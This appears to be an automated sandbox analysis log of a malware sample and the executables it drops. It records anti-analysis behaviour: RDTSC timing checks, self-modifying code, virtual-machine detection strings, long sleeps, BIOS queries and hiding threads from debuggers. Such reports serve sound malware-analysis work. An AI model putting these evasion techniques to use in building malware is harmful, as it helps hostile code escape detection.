Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90202 second address: 4C9021A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9021A second address: 4C90220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90220 second address: 4C90224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0712 second address: 4CF0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0716 second address: 4CF071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF071C second address: 4CF0754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49C0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49BEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0754 second address: 4CF075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF075A second address: 4CF075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF075E second address: 4CF0762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0762 second address: 4CF0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F97B4EC49BFh 0x00000010 sub esi, 3001680Eh 0x00000016 jmp 00007F97B4EC49C9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F97B4EC49C0h 0x00000022 add cx, C688h 0x00000027 jmp 00007F97B4EC49BBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F97B4EC49C6h 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 jmp 00007F97B4EC49C0h 0x0000003d push dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F97B4EC49C7h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0806 second address: 4CF0834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ABE39F41h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4F2EDCAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0834 second address: 4CF083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D915E second address: 9D918A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F97B4F2EDD4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA073E second address: 4CA0743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0743 second address: 4CA0772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4F2EDD4h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F97B4F2EDCAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0772 second address: 4CA0776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0776 second address: 4CA077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA077C second address: 4CA0782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0782 second address: 4CA0786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0786 second address: 4CA08A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F97B4EC49C0h 0x00000012 push FFFFFFFEh 0x00000014 pushad 0x00000015 mov ecx, 289E384Dh 0x0000001a mov ecx, 6EA30C49h 0x0000001f popad 0x00000020 call 00007F97B4EC49B9h 0x00000025 pushad 0x00000026 call 00007F97B4EC49C2h 0x0000002b mov bl, al 0x0000002d pop ebx 0x0000002e call 00007F97B4EC49BCh 0x00000033 pushfd 0x00000034 jmp 00007F97B4EC49C2h 0x00000039 add ax, 08F8h 0x0000003e jmp 00007F97B4EC49BBh 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 jmp 00007F97B4EC49C4h 0x0000004d pushfd 0x0000004e jmp 00007F97B4EC49C2h 0x00000053 adc cl, FFFFFF88h 0x00000056 jmp 00007F97B4EC49BBh 0x0000005b popfd 0x0000005c popad 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 pushad 0x00000062 pushfd 0x00000063 jmp 00007F97B4EC49BFh 0x00000068 and ch, FFFFFFCEh 0x0000006b jmp 00007F97B4EC49C9h 0x00000070 popfd 0x00000071 jmp 00007F97B4EC49C0h 0x00000076 popad 0x00000077 mov eax, dword ptr [eax] 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F97B4EC49BEh 0x00000080 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08A3 second address: 4CA08D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F97B4F2EDD9h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08D6 second address: 4CA08DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA08DC second address: 4CA091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4F2EDD0h 0x00000009 and ah, 00000038h 0x0000000c jmp 00007F97B4F2EDCBh 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 56DC22FBh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F97B4F2EDCCh 0x00000024 pop eax 0x00000025 mov bh, 9Dh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA091C second address: 4CA096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4EC49C3h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 20148B05h 0x00000015 jmp 00007F97B4EC49BBh 0x0000001a mov eax, dword ptr fs:[00000000h] 0x00000020 jmp 00007F97B4EC49C6h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA096D second address: 4CA0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 82E854 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 82E8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 9F4C2D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: 9DF63F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Special instruction interceptor: First address: A509B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: ABE854 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: ABE8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C84C2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C6F63F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CE09B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B93E26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: D3CD86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: D3B792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B9153E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: B93D27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Special instruction interceptor: First address: DC8650 instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: F8191C instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: F817F8 instructions caused by: Self-modifying code
Source: C:\Users\user\1000350002\6a8d4317d4.exe Special instruction interceptor: First address: 115EF50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4B9DC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4B8D77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 4E2789 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 31DA80 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Special instruction interceptor: First address: 55239C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 463E26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 60CD86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 60B792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46153E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 463D27 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 698650 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 2D191C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 2D17F8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Special instruction interceptor: First address: 4AEF50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 1BE854 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 1BE8C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 384C2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 36F63F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Special instruction interceptor: First address: 3E09B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 4CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 4E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Memory allocated: 6E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Code function: 0_2_04CF0DC8 rdtsc 0_2_04CF0DC8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 382
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2996 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3052 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep count: 382 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep time: -11460000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6192 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 772 Thread sleep count: 48 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 772 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2724 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5716 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 6624 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 3636 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 5320 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 3964 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 1464 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe TID: 4944 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4228 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe TID: 2472 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe TID: 2472 Thread sleep time: -186000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe TID: 6960 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe TID: 5992 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, ea2c7beae0.exe, ea2c7beae0.exe, 00000007.00000002.2463650176.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 6a8d4317d4.exe, 00000008.00000002.2538371767.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730629951.000000000049A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2696051122.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, ea2c7beae0.exe, 00000010.00000002.2921950661.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000011.00000002.2866146999.0000000001119000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ea2c7beae0.exe, 00000007.00000002.2464806930.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@{
Source: num.exe, 0000000F.00000002.2731328670.0000000001221000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarep:
Source: ea2c7beae0.exe, ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2815175057.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: num.exe, 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: skotes.exe, 00000006.00000002.2921573681.0000000001437000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: num.exe, 00000013.00000002.2904376187.0000000000C73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP|
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware8U
Source: h3yRbjNWk1.exe, 00000000.00000002.1721300918.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1758524084.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1760766103.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp, ea2c7beae0.exe, 00000007.00000002.2463650176.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000008.00000002.2538371767.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730629951.000000000049A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2696051122.0000000001119000.00000040.00000001.01000000.0000000A.sdmp, ea2c7beae0.exe, 00000010.00000002.2921950661.0000000000D1D000.00000040.00000001.01000000.00000009.sdmp, 6a8d4317d4.exe, 00000011.00000002.2866146999.0000000001119000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6a8d4317d4.exe, 0000000E.00000002.2695281635.000000000098A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 6a8d4317d4.exe, 00000011.00000002.2867421028.0000000001669000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2815175057.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813780457.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587521700.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587799126.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000350002\6a8d4317d4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_053601BA Start: 053602BB End: 053601E3 6_2_053601BA
